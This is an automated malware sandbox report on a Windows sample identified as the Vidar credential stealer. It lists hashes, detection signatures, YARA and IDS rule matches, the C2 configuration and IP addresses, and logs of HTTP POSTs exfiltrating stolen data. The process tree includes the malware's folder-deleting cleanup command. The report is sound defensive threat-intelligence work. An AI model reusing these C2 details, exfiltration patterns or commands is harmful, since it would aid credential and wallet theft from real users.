
Windows Analysis Report
bind.aspx.exe

Overview

General Information

Sample name: bind.aspx.exe
Analysis ID: 1521042
MD5: 9c49281d063296a545c79bf288d4c3bf
SHA1: 403babf2b5811ba796517ce45235d261ad858620
SHA256: 3a29214c3a66734c4213be2307f42e30568548e4f0493eb246be3cdc1345ceb1
Tags: exe user-NDA0E

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • bind.aspx.exe (PID: 6376 cmdline: "C:\Users\user\Desktop\bind.aspx.exe" MD5: 9C49281D063296A545C79BF288D4C3BF)
    • cmd.exe (PID: 7980 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8032 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "22857ff23603709764e7e7e3e4fd64bf"}
Source | Rule | Description | Author | Strings
bind.aspx.exe | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
bind.aspx.exe | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
bind.aspx.exe | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x1c820:$s1: JohnDoe
  • 0x1c828:$s2: HAL9TH
bind.aspx.exe | MALWARE_Win_EXEPWSH_DLAgent | Detects SystemBC | ditekSHen
  • 0x200eb:$pwsh: powershell
  • 0x4aadf8:$s1: GET %s HTTP/1
  • 0x259280:$s4: LdrLoadDll
  • 0x25c1bc:$s4: LdrLoadDll
  • 0x25c43d:$s4: LdrLoadDll
  • 0x25cedf:$s4: LdrLoadDll
  • 0xdbcc0:$v6: start
  • 0xdc96a:$v6: start
  • 0xdf159:$v6: start
  • 0xdf1c9:$v6: start
  • 0xdf4e6:$v6: start
  • 0xdf5c9:$v6: start
  • 0xdf642:$v6: start
  • 0xe02c6:$v6: start
  • 0xe11b7:$v6: start
  • 0xf0460:$v6: start
  • 0xf0477:$v6: start
  • 0xf0493:$v6: start
  • 0xf04ad:$v6: start
  • 0xf97bc:$v6: start
  • 0xfa879:$v6: start
Source | Rule | Description | Author | Strings
00000004.00000000.1269068193.000000000035E000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: bind.aspx.exe PID: 6376 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: bind.aspx.exe PID: 6376 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: bind.aspx.exe PID: 6376 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
4.2.bind.aspx.exe.340000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
4.2.bind.aspx.exe.340000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x1c820:$s1: JohnDoe
  • 0x1c828:$s2: HAL9TH
4.2.bind.aspx.exe.340000.0.unpack | MALWARE_Win_EXEPWSH_DLAgent | Detects SystemBC | ditekSHen
  • 0x200eb:$pwsh: powershell
  • 0x4aadf8:$s1: GET %s HTTP/1
  • 0x259280:$s4: LdrLoadDll
  • 0x25c1bc:$s4: LdrLoadDll
  • 0x25c43d:$s4: LdrLoadDll
  • 0x25cedf:$s4: LdrLoadDll
  • 0xdbcc0:$v6: start
  • 0xdc96a:$v6: start
  • 0xdf159:$v6: start
  • 0xdf1c9:$v6: start
  • 0xdf4e6:$v6: start
  • 0xdf5c9:$v6: start
  • 0xdf642:$v6: start
  • 0xe02c6:$v6: start
  • 0xe11b7:$v6: start
  • 0xf0460:$v6: start
  • 0xf0477:$v6: start
  • 0xf0493:$v6: start
  • 0xf04ad:$v6: start
  • 0xf97bc:$v6: start
  • 0xfa879:$v6: start
4.0.bind.aspx.exe.340000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
4.0.bind.aspx.exe.340000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x1c820:$s1: JohnDoe
  • 0x1c828:$s2: HAL9TH
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-28T03:29:40.788591+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:42.362925+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49710 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:43.812034+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49711 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:45.267797+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49712 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:46.754710+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49713 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:48.313001+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49714 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:49.305343+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49715 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:50.425961+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49716 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:51.744737+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49717 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:53.368387+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49718 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:54.811226+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49719 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:56.315413+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49720 | 135.181.31.18 | 443 | TCP
2024-09-28T03:29:58.709652+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49721 | 135.181.31.18 | 443 | TCP
2024-09-28T03:30:00.892970+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49722 | 135.181.31.18 | 443 | TCP
2024-09-28T03:30:02.576777+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 49724 | 135.181.31.18 | 443 | TCP
2024-09-28T03:30:05.277005+0200 | 2054495 | 1 | A Network Trojan was detected | 192.168.2.7 | 49725 | 95.164.119.162 | 80 | TCP
2024-09-28T03:29:46.063893+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 135.181.31.18 | 443 | 192.168.2.7 | 49712 | TCP
2024-09-28T03:29:47.530135+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 135.181.31.18 | 443 | 192.168.2.7 | 49713 | TCP
2024-09-28T03:29:47.529852+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.7 | 49713 | 135.181.31.18 | 443 | TCP

AV Detection

Source: bind.aspx.exe | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "22857ff23603709764e7e7e3e4fd64bf"}
Source: bind.aspx.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: bind.aspx.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00346AA4 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00346AA4
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034F8C3 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,4_2_0034F8C3
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00346A41 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00346A41
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003483E8 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,4_2_003483E8
Source: bind.aspx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 135.181.31.18:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: Binary string: freebl3.pdb source: bind.aspx.exe, freebl3.dll.4.dr
Source: Binary string: mozglue.pdbP source: bind.aspx.exe, mozglue.dll.4.dr
Source: Binary string: freebl3.pdbp source: bind.aspx.exe, freebl3.dll.4.dr
Source: Binary string: nss3.pdb@ source: bind.aspx.exe, nss3.dll.4.dr
Source: Binary string: softokn3.pdb@ source: bind.aspx.exe, softokn3.dll.4.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: bind.aspx.exe, vcruntime140.dll.4.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: bind.aspx.exe, msvcp140.dll.4.dr
Source: Binary string: nss3.pdb source: bind.aspx.exe, nss3.dll.4.dr
Source: Binary string: mozglue.pdb source: bind.aspx.exe, mozglue.dll.4.dr
Source: Binary string: softokn3.pdb source: bind.aspx.exe, softokn3.dll.4.dr
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034AAF6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0034AAF6
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003538DD wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_003538DD
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003532CD wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,4_2_003532CD
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00349B56 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00349B56
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034B957 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0034B957
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003413B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_003413B4
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00353FEA wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00353FEA
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00349633 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00349633
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00353C2D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00353C2D
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034A2AF wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0034A2AF
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_00349305 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_00349305
Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_003536A9 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_003536A9
Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\bind.aspx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Networking

Source: Network traffic | Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.7:49725 -> 95.164.119.162:80
Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49713 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 135.181.31.18:443 -> 192.168.2.7:49713
Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 135.181.31.18:443 -> 192.168.2.7:49712
Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199761128941
Source: global traffic | HTTP traffic detected: GET /profiles/76561199761128941 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 95.164.119.162
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | ASN Name: VAKPoltavaUkraineUA
Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49715 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49721 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49720 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49714 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49716 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49709 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49713 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49711 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49719 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49717 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49718 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49712 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49722 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49710 -> 135.181.31.18:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49724 -> 135.181.31.18:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 256 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 8197 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 829 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 457 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 129565 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: stadiatechnologies.com | Content-Length: 2653 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 135.181.31.18
                    Source: C:\Users\user\Desktop\bind.aspx.exe | Code function: 4_2_0034502A InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_0034502A
                    Source: global traffic | HTTP traffic detected: GET /profiles/76561199761128941 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                    Source: global traffic | DNS traffic detected: DNS query: stadiatechnologies.com
                    Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 | Host: 135.181.31.18 | Content-Length: 256 | Connection: Keep-Alive | Cache-Control: no-cache
